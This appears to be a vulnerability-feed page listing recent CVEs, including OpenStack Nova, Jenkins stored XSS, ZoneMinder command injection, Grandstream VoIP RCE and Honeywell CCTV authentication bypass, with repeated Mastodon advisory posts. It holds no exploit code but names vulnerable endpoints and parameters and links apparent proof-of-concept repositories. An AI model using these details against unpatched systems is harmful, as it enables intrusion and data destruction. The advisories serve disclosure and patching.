CVE-2026-24708
(8.2 HIGH)

EPSS: 0.00%

updated 2026-02-18T18:30:51

2 posts

An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qemu-img without a format restriction, resulting in an unsafe image resize operation that could destroy data on the host system. Only compute nodes using th

thehackerwire@mastodon.social at 2026-02-18T18:59:07.000Z ##

🟠 CVE-2026-24708 - High (8.2)

An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qem...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T18:59:07.000Z ##

🟠 CVE-2026-24708 - High (8.2)

An issue was discovered in OpenStack Nova before 30.2.2, 31 before 31.2.1, and 32 before 32.1.1. By writing a malicious QCOW header to a root or ephemeral disk and then triggering a resize, a user may convince Nova's Flat image backend to call qem...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2507
(7.5 HIGH)

EPSS: 0.00%

updated 2026-02-18T18:30:51

4 posts

When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

thehackerwire@mastodon.social at 2026-02-18T17:24:09.000Z ##

🟠 CVE-2026-2507 - High (7.5)

When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T17:23:17.000Z ##

🟠 CVE-2026-2507 - High (7.5)

When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T17:24:09.000Z ##

🟠 CVE-2026-2507 - High (7.5)

When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T17:23:17.000Z ##

🟠 CVE-2026-2507 - High (7.5)

When BIG-IP AFM or BIG-IP DDoS is provisioned, undisclosed traffic can cause TMM to terminate.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70148
(7.5 HIGH)

EPSS: 0.00%

updated 2026-02-18T18:30:47

2 posts

Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parameter, resulting in insecure direct object reference (IDOR).

thehackerwire@mastodon.social at 2026-02-18T19:00:05.000Z ##

🟠 CVE-2025-70148 - High (7.5)

Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parame...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T19:00:05.000Z ##

🟠 CVE-2025-70148 - High (7.5)

Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parame...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-65791
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T18:30:39

2 posts

ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.

1 repos

https://github.com/rishavand1/CVE-2025-65791

thehackerwire@mastodon.social at 2026-02-18T17:23:28.000Z ##

🔴 CVE-2025-65791 - Critical (9.8)

ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T17:23:28.000Z ##

🔴 CVE-2025-65791 - Critical (9.8)

ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70998
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T18:30:39

4 posts

UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.

thehackerwire@mastodon.social at 2026-02-18T16:27:40.000Z ##

🔴 CVE-2025-70998 - Critical (9.8)

UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:27:07.000Z ##

🔴 CVE-2025-70998 - Critical (9.8)

UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:27:40.000Z ##

🔴 CVE-2025-70998 - Critical (9.8)

UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:27:07.000Z ##

🔴 CVE-2025-70998 - Critical (9.8)

UTT HiPER 810 / nv810v4 router firmware v1.5.0-140603 was discovered to contain insecure default credentials for the telnet service, possibly allowing a remote attacker to gain root access via a crafted script.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27099
(8.0 HIGH)

EPSS: 0.00%

updated 2026-02-18T18:30:38

6 posts

Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.

offseq at 2026-02-18T20:00:14.518Z ##

⚠️ HIGH severity: Jenkins 2.483-2.550 & LTS 2.492.1-2.541.1 hit by CVE-2026-27099 (stored XSS). Requires Agent/Configure or Agent/Disconnect permissions. Patch, restrict privileges, and review logs! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-18T16:27:49.000Z ##

🟠 CVE-2026-27099 - High (8)

Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:27:16.000Z ##

🟠 CVE-2026-27099 - High (8)

Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

offseq@infosec.exchange at 2026-02-18T20:00:14.000Z ##

⚠️ HIGH severity: Jenkins 2.483-2.550 & LTS 2.492.1-2.541.1 hit by CVE-2026-27099 (stored XSS). Requires Agent/Configure or Agent/Disconnect permissions. Patch, restrict privileges, and review logs! radar.offseq.com/threat/cve-20 #OffSeq #Jenkins #XSS #Security

##

thehackerwire@mastodon.social at 2026-02-18T16:27:49.000Z ##

🟠 CVE-2026-27099 - High (8)

Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:27:16.000Z ##

🟠 CVE-2026-27099 - High (8)

Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the "Mark temporarily offline" offline cause, resulting in a stored cross-site scripting (XSS) vulnerabilit...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-61982
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T18:30:38

2 posts

An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

thehackerwire@mastodon.social at 2026-02-18T15:32:38.000Z ##

🟠 CVE-2025-61982 - High (7.8)

An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to tr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T15:32:38.000Z ##

🟠 CVE-2025-61982 - High (7.8)

An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to tr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70150
(9.8 CRITICAL)

EPSS: 0.00%

updated 2026-02-18T18:24:20.040000

2 posts

CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.

thehackerwire@mastodon.social at 2026-02-18T18:59:55.000Z ##

🔴 CVE-2025-70150 - Critical (9.8)

CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T18:59:55.000Z ##

🔴 CVE-2025-70150 - Critical (9.8)

CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70866
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-18T17:52:44.520000

2 posts

LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and user authentication guards share the same user provider without role-based access control verification.

thehackerwire@mastodon.social at 2026-02-17T16:36:41.000Z ##

🟠 CVE-2025-70866 - High (8.8)

LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:36:41.000Z ##

🟠 CVE-2025-70866 - High (8.8)

LavaLite CMS 10.1.0 is vulnerable to Incorrect Access Control. An authenticated user with low-level privileges (User role) can directly access the admin backend by logging in through /admin/login. The vulnerability exists because the admin and use...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70954
(7.5 HIGH)

EPSS: 0.02%

updated 2026-02-18T17:52:44.520000

2 posts

A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specific pointer is null before accessing it. By sending a malicious transaction or smart contract, an attacker can trigger this null pointer dereference, causi

thehackerwire@mastodon.social at 2026-02-17T16:20:13.000Z ##

🟠 CVE-2025-70954 - High (7.5)

A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:20:13.000Z ##

🟠 CVE-2025-70954 - High (7.5)

A Null Pointer Dereference vulnerability exists in the TON Virtual Machine (TVM) within the TON Blockchain before v2025.06. The issue is located in the execution logic of the INMSGPARAM instruction, where the program fails to validate if a specifi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-70828
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-18T17:52:22.253000

2 posts

An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration

1 repos

https://github.com/xiaoxiaoranxxx/CVE-2025-70828

thehackerwire@mastodon.social at 2026-02-17T17:33:45.000Z ##

🟠 CVE-2025-70828 - High (8.8)

An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T17:33:45.000Z ##

🟠 CVE-2025-70828 - High (8.8)

An issue in Datart v1.0.0-rc.3 allows attackers to execute arbitrary code via the url parameter in the JDBC configuration

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-15578
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-18T17:52:22.253000

2 posts

Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🔴 CVE-2025-15578 - Critical (9.8)

Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T16:01:54.000Z ##

🔴 CVE-2025-15578 - Critical (9.8)

Maypole versions from 2.10 through 2.13 for Perl generates session ids insecurely. The session id is seeded with the system time (which is available from HTTP response headers), a call to the built-in rand() function, and the PID.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1334
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-18T17:52:22.253000

2 posts

An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.

offseq@infosec.exchange at 2026-02-17T00:00:45.000Z ##

⚠️ CVE-2026-1334: HIGH-severity out-of-bounds read in SOLIDWORKS eDrawings (2025 SP0/2026 SP0). Exploiting crafted EPRT files can enable code execution. Patch when released, restrict sources, use sandboxing. No known exploits yet. radar.offseq.com/threat/cve-20 #OffSeq #SOLIDWORKS #Infosec

##

thehackerwire@mastodon.social at 2026-02-16T22:37:33.000Z ##

🟠 CVE-2026-1334 - High (7.8)

An Out-Of-Bounds Read vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a sp...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1046
(7.6 HIGH)

EPSS: 0.03%

updated 2026-02-18T17:52:22.253000

3 posts

Mattermost Desktop App versions <=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost Advisory ID: MMSA-2026-00577

thehackerwire@mastodon.social at 2026-02-16T22:57:48.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:56:50.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-16T22:37:42.000Z ##

🟠 CVE-2026-1046 - High (7.6)

Mattermost Desktop App versions &lt;=6.0 6.2.0 5.2.13.0 fail to validate help links which allows a malicious Mattermost server to execute arbitrary executables on a user’s system via the user clicking on certain items in the Help menu Mattermost...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1750
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-18T17:52:22.253000

1 posts

The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to supply the 'ec_store_admin_access' parameter during a

thehackerwire@mastodon.social at 2026-02-16T22:38:28.000Z ##

🟠 CVE-2026-1750 - High (8.8)

The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-32061
(8.8 HIGH)

EPSS: 0.02%

updated 2026-02-18T17:52:22.253000

1 posts

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buffer overflow when receiving a specific packet on the established upper layer L2CAP channel. An attacker can leverage this vulnerability to obtain remote c

thehackerwire@mastodon.social at 2026-02-16T22:38:09.000Z ##

🟠 CVE-2025-32061 - High (8.8)

The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-2329
(0 None)

EPSS: 0.00%

updated 2026-02-18T17:51:53.510000

6 posts

An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.

undercodenews@mastodon.social at 2026-02-19T01:15:28.000Z ##

Critical Vulnerability in Grandstream GXP1600 VoIP Phones Exposes Users to Remote Code Execution

A severe cybersecurity vulnerability has been discovered in Grandstream GXP1600 VoIP phones that could allow attackers to remotely execute malicious code with root privileges. This flaw, identified as CVE-2026-2329, is caused by an unauthenticated stack-based buffer overflow in the device's firmware. It is critical as it allows remote access via the /cgi-bin/api.values.get…

undercodenews.com/critical-vul

##

hackerworkspace at 2026-02-18T20:30:00.091Z ##

CVE-2026-2329: Critical Unauthenticated Stack Buffer Overflow in Grandstream GXP1600 VoIP Phones (FIXED)

rapid7.com/blog/post/ve-cve-20

##

undercodenews@mastodon.social at 2026-02-18T18:10:20.000Z ##

Critical Vulnerability Found in Grandstream GXP1600 Series VoIP Phones: Remote Code Execution Threat

A major cybersecurity flaw has been discovered in the Grandstream GXP1600 series of VoIP phones, exposing users to the potential risk of remote code execution. The vulnerability, identified as CVE-2026-2329, has been assigned a dangerously high CVSS score of 9.3 out of 10, highlighting its severity. This issue could allow attackers to take control of affected devices,…

undercodenews.com/critical-vul

##

offseq at 2026-02-18T15:30:34.640Z ##

🚨 CVE-2026-2329: CRITICAL stack buffer overflow in Grandstream GXP1610 series (all models) via /cgi-bin/api.values.get. Unauth RCE possible — restrict HTTP API access, segment devices, and monitor traffic. Patch ASAP when available. radar.offseq.com/threat/cve-20

##

hackerworkspace@infosec.exchange at 2026-02-18T20:30:00.000Z ##

CVE-2026-2329: Critical Unauthenticated Stack Buffer Overflow in Grandstream GXP1600 VoIP Phones (FIXED)

rapid7.com/blog/post/ve-cve-20

#cybersecurity #vulnerability #exploit

##

offseq@infosec.exchange at 2026-02-18T15:30:34.000Z ##

🚨 CVE-2026-2329: CRITICAL stack buffer overflow in Grandstream GXP1610 series (all models) via /cgi-bin/api.values.get. Unauth RCE possible — restrict HTTP API access, segment devices, and monitor traffic. Patch ASAP when available. radar.offseq.com/threat/cve-20 #OffSeq #VoIP #RCE #Security

##

CVE-2026-1670
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-18T17:51:53.510000

10 posts

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

defendopsdiaries at 2026-02-18T21:11:25.258Z ##

A single overlooked API flaw lets hackers hijack Honeywell CCTV cameras without even logging in—just how easy is it to take over a surveillance system? The answer is unsettling

thedefendopsdiaries.com/cve-20

##

beyondmachines1 at 2026-02-18T10:01:23.483Z ##

Critical Authentication Bypass in Honeywell CCTV Products Allows Remote Account Takeover

Honeywell reports a critical vulnerability (CVE-2026-1670) in several CCTV models that allows unauthenticated attackers to take over accounts by changing the password recovery email via an exposed API.

**Make sure your CCTV cameras are isolated from the internet and accessible from trusted networks only. Then check your Honeywell CCTV firmware versions and contact their support for patches.**

beyondmachines.net/event_detai

##

offseq at 2026-02-18T00:00:43.881Z ##

⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T23:20:12.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T23:19:24.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

defendopsdiaries@infosec.exchange at 2026-02-18T21:11:25.000Z ##

A single overlooked API flaw lets hackers hijack Honeywell CCTV cameras without even logging in—just how easy is it to take over a surveillance system? The answer is unsettling

thedefendopsdiaries.com/cve-20

##

beyondmachines1@infosec.exchange at 2026-02-18T10:01:23.000Z ##

Critical Authentication Bypass in Honeywell CCTV Products Allows Remote Account Takeover

Honeywell reports a critical vulnerability (CVE-2026-1670) in several CCTV models that allows unauthenticated attackers to take over accounts by changing the password recovery email via an exposed API.

**Make sure your CCTV cameras are isolated from the internet and accessible from trusted networks only. Then check your Honeywell CCTV firmware versions and contact their support for patches.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

offseq@infosec.exchange at 2026-02-18T00:00:43.000Z ##

⚠️ CRITICAL: Honeywell I-HIB2PI-UL 2MP IP (6.1.22.1216) has CVE-2026-1670 (CWE-306) — missing auth on API enables remote attackers to change recovery emails and take over accounts. Patch or segment now! radar.offseq.com/threat/cve-20 #OffSeq #Honeywell #Vuln #OTSecurity

##

thehackerwire@mastodon.social at 2026-02-17T23:20:12.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-17T23:19:24.000Z ##

🔴 CVE-2026-1670 - Critical (9.8)

The affected products are vulnerable to an unauthenticated API endpoint exposure, which may allow an attacker to remotely change the "forgot password" recovery email address.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-26119
(8.8 HIGH)

EPSS: 0.08%

updated 2026-02-18T17:51:53.510000

6 posts

Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

beyondmachines1 at 2026-02-18T17:01:23.963Z ##

Microsoft Patches Privilege Escalation Flaw in Windows Admin Center

Microsoft patched a privilege escalation vulnerability (CVE-2026-26119) in Windows Admin Center that allows low-privileged users to impersonate administrators. This flaw enables remote command execution and lateral movement across enterprise networks, including Active Directory and Azure environments.

**If you use Windows Admin Center, apply the February 17 security update immediately — this flaw can let an attacker with minimal access take over your entire domain. While you're at it, review who has access to your Admin Center and restrict it to only those who truly need it.**

beyondmachines.net/event_detai

##

offseq at 2026-02-18T04:30:30.234Z ##

🚨 CVE-2026-26119 (HIGH, CVSS 8.8): Microsoft Windows Admin Center 1809.0 vulnerable to improper authentication, enabling privilege escalation. No patch or active exploitation yet. Restrict access & monitor closely! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-17T23:19:23.000Z ##

🟠 CVE-2026-26119 - High (8.8)

Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

beyondmachines1@infosec.exchange at 2026-02-18T17:01:23.000Z ##

Microsoft Patches Privilege Escalation Flaw in Windows Admin Center

Microsoft patched a privilege escalation vulnerability (CVE-2026-26119) in Windows Admin Center that allows low-privileged users to impersonate administrators. This flaw enables remote command execution and lateral movement across enterprise networks, including Active Directory and Azure environments.

**If you use Windows Admin Center, apply the February 17 security update immediately — this flaw can let an attacker with minimal access take over your entire domain. While you're at it, review who has access to your Admin Center and restrict it to only those who truly need it.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

offseq@infosec.exchange at 2026-02-18T04:30:30.000Z ##

🚨 CVE-2026-26119 (HIGH, CVSS 8.8): Microsoft Windows Admin Center 1809.0 vulnerable to improper authentication, enabling privilege escalation. No patch or active exploitation yet. Restrict access & monitor closely! radar.offseq.com/threat/cve-20 #OffSeq #WindowsAdminCenter #Security

##

thehackerwire@mastodon.social at 2026-02-17T23:19:23.000Z ##

🟠 CVE-2026-26119 - High (8.8)

Improper authentication in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33241
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T17:51:53.510000

2 posts

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.

thehackerwire@mastodon.social at 2026-02-18T16:01:40.000Z ##

🟠 CVE-2025-33241 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, informatio...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-18T16:01:40.000Z ##

🟠 CVE-2025-33241 - High (7.8)

NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by loading a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, informatio...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33240
(7.8 HIGH)

EPSS: 0.00%

updated 2026-02-18T17:51:53.510000

2 posts

